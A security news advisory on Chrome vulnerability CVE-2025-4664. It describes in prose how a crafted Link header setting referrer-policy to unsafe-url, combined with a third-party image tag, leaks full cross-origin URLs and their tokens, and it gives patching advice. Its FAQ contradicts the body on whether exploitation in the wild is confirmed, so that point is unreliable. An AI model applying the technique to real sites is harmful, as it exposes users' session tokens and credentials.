📰 New Chrome Vulnerability CVE-2025-4664 Allows Cross-Origin Data Leak via Referrer Policy Flaw
🔍 What Happened?
Google has recently released a security update for its Chrome browser to patch four vulnerabilities—one of which is actively exploited in the wild. Tracked as CVE-2025-4664, this high-severity issue stems from insufficient policy enforcement in the Loader component of Chrome.
According to Google, versions of Chrome prior to 136.0.7103.113 are vulnerable, allowing remote attackers to potentially leak cross-origin data using a specially crafted HTML page. The CVSS score of 4.3 may seem moderate, but the exploit's presence in the wild and potential to leak sensitive user information significantly raise its risk level.
🧪 How Does CVE-2025-4664 Work?
Security researcher Vsevolod Kokorin (@slonser_) identified and publicly detailed the vulnerability on May 5, 2025, via a series of posts on X (formerly Twitter). He highlighted a core issue in how Chrome handles the Link header in sub-resource requests—a behavior that differs from other major browsers.
The Link header can define a referrer-policy, and Chrome respects this on sub-resources. When set to unsafe-url, this behavior allows a third-party site to receive the full query string from another origin—which could include sensitive information like session tokens, authentication credentials, or personally identifiable data.
🎯 Why Is This Dangerous?
Kokorin demonstrated that the information can be exfiltrated by embedding an image tag from a third-party domain into a malicious HTML page. The browser, honoring the crafted referrer-policy, could leak the full URL—including sensitive query parameters—to the attacker.
This kind of leak could potentially lead to account takeovers or other forms of identity theft, especially if the stolen data includes login tokens or unique session identifiers.
🛠️ Who Is Affected?
Users on older versions of Google Chrome, particularly before version 136.0.7103.113, are affected. However, since other Chromium-based browsers like Microsoft Edge, Brave, Opera, and Vivaldi share the same core engine, users of these browsers may also be vulnerable if updates haven't been rolled out or applied.
🔄 What Should You Do?
- Update Chrome immediately to version 136.0.7103.113 or .114 (Windows and Mac) or 136.0.7103.113 for Linux.
- Apply updates to other Chromium-based browsers as they become available.
- Avoid clicking on suspicious links or visiting untrusted websites, especially if they contain embedded images or media from third-party sources.
- Developers and website administrators should review how query parameters are used in their applications and avoid including sensitive data in the URL.
📢 Update from CISA
On May 16, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-4664 to its Known Exploited Vulnerabilities (KEV) catalog. CISA has mandated federal agencies to patch affected systems no later than June 5, 2025.
❓ Frequently Asked Questions (FAQs)
❓ What is CVE-2025-4664?
CVE-2025-4664 is a vulnerability in Chrome's Loader component that allows attackers to leak cross-origin data using a crafted referrer-policy in an HTML page.
❓ Why is it considered high severity?
Even though its CVSS score is 4.3, it has been exploited in the wild, and it could leak sensitive data like tokens or user credentials, potentially leading to full account takeovers.
❓ Which browsers are at risk?
Any browser based on Chromium—including Google Chrome, Microsoft Edge, Brave, Opera, and Vivaldi—is potentially at risk if it's not updated to the latest version.
❓ How can users protect themselves?
By updating their browser immediately, avoiding untrusted sites, and ensuring sensitive data isn't exposed via URL query parameters.
❓ Has this been used in real attacks?
There is no public evidence that it has been exploited beyond proof-of-concept demos, but Google and CISA confirmed that an exploit exists in the wild, raising concerns of possible real-world attacks.
🧾 Conclusion
The discovery of CVE-2025-4664 highlights the persistent and evolving nature of web-based threats. Despite its relatively low CVSS score, the fact that this vulnerability can leak cross-origin data through something as seemingly innocuous as an image tag makes it a significant security concern.
All users—whether casual Chrome users or enterprise administrators—should act quickly to update affected browsers and remain vigilant. In the modern digital world, even small oversights in policy enforcement can lead to major breaches of privacy and security.
Stay safe. Stay updated.
🔗 Follow Us for More Cybersecurity News
Like this post? Stay informed by following us on Twitter and LinkedIn for more timely updates on security patches, emerging threats, and tech insights.